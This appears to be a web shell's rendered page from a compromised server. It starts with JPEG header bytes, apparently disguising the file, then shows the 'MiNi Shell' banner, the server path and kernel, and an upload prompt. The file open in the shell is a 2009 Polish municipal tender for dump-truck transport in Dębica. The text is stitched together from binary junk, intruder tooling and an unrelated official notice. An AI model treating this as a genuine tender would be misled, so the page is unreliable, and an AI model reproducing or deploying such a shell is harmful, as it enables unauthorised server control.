JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23532-N-2009.html

<p class="kh_header"><b>Dębica: Usługi transportowe materiałów sypkich , samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności minimum 12 Mg, w okresie od  1 maja 2009 r. do  30  kwietnia  2010 r.</b><br>
<b>Numer ogłoszenia: 23532 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 014 6803324, 6803310, faks 014 6803336.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi transportowe materiałów sypkich , samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności minimum 12 Mg, w okresie od  1 maja 2009 r. do  30  kwietnia  2010 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi transportowe materiałów sypkich , samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności minimum 12 Mg, w okresie od  1 maja 2009 r. do  30  kwietnia  2010 r.
Zamawiający dopuszcza składanie ofert częściowych w ilości 4 .
2.1.  Opis przedmiotu zamówienia : 

Część 1 obejmująca transport materiałów sypkich wraz z rozścieleniem- samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności minimum 12 Mg - teren działania południowa część gminy -tereny górzyste (oceniana będzie cena  za 1  km ładowny wraz z  rozścieleniem),

Część 2 obejmująca  pracę samochodu ciężarowego samowyładowczego o dopuszczalnej ładowności minimum 12 Mg - pod koparką- lub pracę w miejscu - teren działania południowa część gminy tereny górzyste (oceniana będzie cena za 1 godzinę pracy samochodu) ,

Część 3 obejmująca transport materiałów sypkich wraz z rozścieleniem-samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności 12 Mg  - teren działania północna część gminy -tereny nizinne ( oceniana będzie cena za 1  km ładowny wraz z  rozścieleniem),

Część 4 obejmującą  pracę samochodu ciężarowego samowyładowczego o dopuszczalnej ładowności minimum 
12 Mg - pod koparką- lub pracę w miejscu - teren działania północna część gminy-tereny nizinne 
( oceniana będzie cena za 1 godzinę pracy samochodu).

W ofercie ( cenie za 1  km transportu ładownego,  cenie za 1 godz. pracy sprzętu) należy
uwzględnić dojazd  samochodu do miejsca wykonywania usługi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.  WARUNKI  UDZIAŁU W POSTĘPOWANIU   ORAZ  SPOSÓB  OCENY   ICH SPEŁNIANIA
O udzielenie zamówienia mogą ubiegać się wykonawcy , którzy :
1) Posiadają uprawnienia  do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Wykonawca  zobowiązany jest posiadać:
a) WAŻNĄ  LICENCJĘ  ( dotyczy części zamówienia nr  1,2,3,4 ) na prowadzenie działalności w zakresie transportu towarowego lub na wykonywanie krajowego transportu drogowego rzeczy - wydaną na podstawie ustawy  z dnia 6 września 2001 r. o Transporcie drogowym (Dz. U. Nr 125 , poz. 1371 z późniejszymi zmianami)  

  
2)   Posiadają  niezbędną  wiedzę  i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi
      do wykonania zamówienia  lub  przedstawią pisemne zobowiązanie innych podmiotów do udostępniania
      potencjału  technicznego i osób zdolnych do wykonania zamówienia.

a) Zamawiający żąda aby Wykonawca  wykazał, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania 
(a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał lub wykonuje z należytą starannością minimum 2 usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia (usługi transportowe samochodem ciężarowym samowyładowczym), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Wymagane jest co najmniej 2 usługi o wartości minimum 10 000,00 zł brutto   każda. 

b) Zamawiający żąda aby Wykonawca wykazał, że dysponuje lub będzie dysponował  narzędziami i urządzeniami niezbędnymi do wykonania  zamówienia ( wskazanie  samochodu ( lub samochodów) ciężarowego samowyładowczego  jakim dysponuje lub będzie dysponował i którego użyje do wykonania zamówienia oraz   wykazanie ,że samochód ten posiada ważne badania techniczne ). Zamawiający żąda złożenia wraz z ofertą dowodu rejestracyjnego samochodu ciężarowego samowyładowczego o ładowności minimum 12 Mg, którym dysponuje lub będzie dysponował Wykonawca.
Jeżeli Wykonawca wskaże sprzęt (samochód ciężarowy samowyładowczy) , którym będzie dysponował,  Zamawiający żąda złożenia pisemnego zobowiązania innych podmiotów do udostępnienia sprzętu (samochodu ciężarowego samowyładowczego o ładowności minimum 12 Mg) niezbędnego  do wykonania zamówienia

c)  Zamawiający żąda aby Wykonawca wykazał, że dysponuje lub będzie dysponował osobami , które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych , wymagane jest posiadanie przez osobę wskazaną do wykonania zamówienia prawa jazdy kategorii C lub wyższej.
  Jeżeli  Wykonawca wskaże osoby, którymi będzie dysponował,  Zamawiający żąda złożenia   pisemnego
  zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

  3) Znajdują  się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

  4) Niepodlegają  wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania warunków podmiotowych udziału w postępowaniu nastąpi na podstawie:
1)	złożonych oświadczeń (w zakresie art. 22 ust. 1 i  art. 24 ust. 1 ustawy Pzp ), 
2)	dokumentów potwierdzających spełnianie tych warunków - 
        - metodą: -spełnia / nie spełnia

ZAMAWIAJĄCY WYKLUCZY WYKONAWCÓW, KTÓRZY:
- nie spełniają warunków udziału w  postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 ustawy Prawo zamówień publicznych,
- wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba, że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji (z zastrzeżeniem zamówień udzielanych na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2 ustawy),
-   złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
- nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 ustawy,
-   podlegają wykluczeniu na podstawie art. 24 ust. 1 pkt 1 - 9
Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą. 

6.  WYMAGANIA PRZEDMIOTOWE ORAZ SPOSÓB OCENY ICH SPEŁNIANIA
1. Wykonanie przedmiotu zamówienia musi być zgodne z opisem przedmiotu zamówienia zawartym w SIWZ  pkt. 2 
2. Oferta musi zagwarantować:
a)  termin realizacji zamówienia - od dnia 1 maja 2009 r. do 30 kwietnia 2010 r.
b) termin płatności wynosi 30 dni od daty wpływu faktury do siedziby Zamawiającego.
c) wartość brutto przedmiotu zamówienia nie będzie podlegać waloryzacji.
Ocena spełniania  wymagań  przedmiotowych nastąpi na podstawie złożonych oświadczeń i dokumentów potwierdzających spełnianie tych wymagań metodą :  spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 5. WYKAZ   DOKUMENTÓW  I  OŚWIADCZEŃ ,  JAKIE  MAJĄ   DOSTARCZYĆ   WYKONAWCY  NA POTWIERDZENIE   SPEŁNIANIA   WARUNKÓW   UDZIAŁU   W   POSTĘPOWANIU
5.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

5.2. Oświadczenie w zakresie art. 24 ust. 1 ustawy Pzp. - Załącznik nr   1 do SIWZ.

5.3. Oświadczenie w zakresie art. 22 ust. 1 ustawy Pzp.-  Załącznik  nr  2 do SIWZ.

5.4. Kopię ważnej licencji  na prowadzenie działalności w zakresie transportu towarowego lub na wykonywanie krajowego transportu drogowego rzeczy - wydanej na podstawie ustawy  z dnia 6 września 2001 r. o Transporcie drogowym (Dz. U. Nr 125 , poz. 1371 z późniejszymi zmianami)  potwierdzoną za zgodność z oryginałem podpisem i pieczęcią imienną osoby upoważnionej do reprezentowania wykonawcy.

5.5 Wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia (usługi transportowe wykonywane samochodem ciężarowym samowyładowczym), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.  Wymagane jest wykazanie co najmniej 2 usług o wartości minimum 10 000,00 zł brutto każda- Załącznik nr 3 do SIWZ, wraz z załączeniem dokumentów potwierdzających, że usługi te  zostały wykonane należycie. 
 
5.6. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych (niezbędne jest dołączenie do wykazu kserokopii prawa jazdy), doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - Załącznik nr 4 do SIWZ ,
5.6. a) - jeżeli w wykazie o którym mowa w ppkt.5.6 Wykonawca wskazał osoby, którymi będzie dysponował,  Zamawiający żąda złożenia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

5.7. Wykaz sprzętu (samochodu ciężarowego samowyładowczego) jakim dysponuje lub będzie dysponował
       Wykonawca i  którego użyje do zrealizowania usługi - Załącznik nr 5 do SIWZ 
5.7.a) jeżeli w wykazie o którym mowa w ppkt.5.7 Wykonawca wskazał sprzęt (samochód ciężarowy samowyładowczy) , którym będzie dysponował,  Zamawiający żąda złożenia pisemnego zobowiązania innych podmiotów do udostępnienia sprzętu (samochodu ciężarowego samowyładowczego )niezbędnego  do wykonania zamówienia.
5.8.  Kopię dowodu rejestracyjnego samochodu ciężarowego samowyładowczego o ładowności minimum 12 Mg , którym dysponuje lub będzie dysponował Wykonawca.
5.9. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej to :
 - zamiast dokumentu o którym mowa  w pkt. 5.1,  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający , że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 mieś. przed upływem  terminu składania ofert .

5.10.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,
nie wydaje się dokumentów, o których mowa w pkt. 5.9. SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5.11. W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane dokumenty wymienione w punkcie  5.1 , 5.2 , 5.3 ,5.4  muszą  być złożone  przez każdego z  wykonawców osobno.
6.  WYMAGANIA PRZEDMIOTOWE ORAZ SPOSÓB OCENY ICH SPEŁNIANIA
1. Wykonanie przedmiotu zamówienia musi być zgodne z opisem przedmiotu zamówienia zawartym w SIWZ  pkt. 2 
2. Oferta musi zagwarantować:
a)  termin realizacji zamówienia - od dnia 1 maja 2009 r. do 30 kwietnia 2010 r.
b) termin płatności wynosi 30 dni od daty wpływu faktury do siedziby Zamawiającego.
c) wartość brutto przedmiotu zamówienia nie będzie podlegać waloryzacji..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Dębicy - pok.27
39-200 Dębica, ul. Batorego 13.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 09:00, miejsce: Urząd Gminy w Dębicy - Sekretariat
39-200 Dębica, ul. Batorego 13.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi transportowe materiałów sypkich , samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności minimum 12 Mg, w okresie od  1 maja 2009 r. do  30  kwietnia  2010 r..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia : 

Część 1 obejmująca transport materiałów sypkich wraz z rozścieleniem- samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności minimum 12 Mg - teren działania południowa część gminy -tereny górzyste (oceniana będzie cena  za 1  km ładowny wraz z  rozścieleniem),.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi transportowe materiałów sypkich , samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności minimum 12 Mg, w okresie od  1 maja 2009 r. do  30  kwietnia  2010 r..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 obejmująca  pracę samochodu ciężarowego samowyładowczego o dopuszczalnej ładowności minimum 12 Mg - pod koparką- lub pracę w miejscu - teren działania południowa część gminy tereny górzyste (oceniana będzie cena za 1 godzinę pracy samochodu) ,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi transportowe materiałów sypkich , samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności minimum 12 Mg, w okresie od  1 maja 2009 r. do  30  kwietnia  2010 r..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 obejmująca transport materiałów sypkich wraz z rozścieleniem-samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności 12 Mg  - teren działania północna część gminy -tereny nizinne ( oceniana będzie cena za 1  km ładowny wraz z  rozścieleniem),.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi transportowe materiałów sypkich , samochodem ciężarowym samowyładowczym o dopuszczalnej ładowności minimum 12 Mg, w okresie od  1 maja 2009 r. do  30  kwietnia  2010 r..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4 obejmującą  pracę samochodu ciężarowego samowyładowczego o dopuszczalnej ładowności minimum 
12 Mg -pod koparką- lub pracę w miejscu - teren działania północna część gminy-tereny nizinne 
( oceniana będzie cena za 1 godzinę pracy samochodu)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com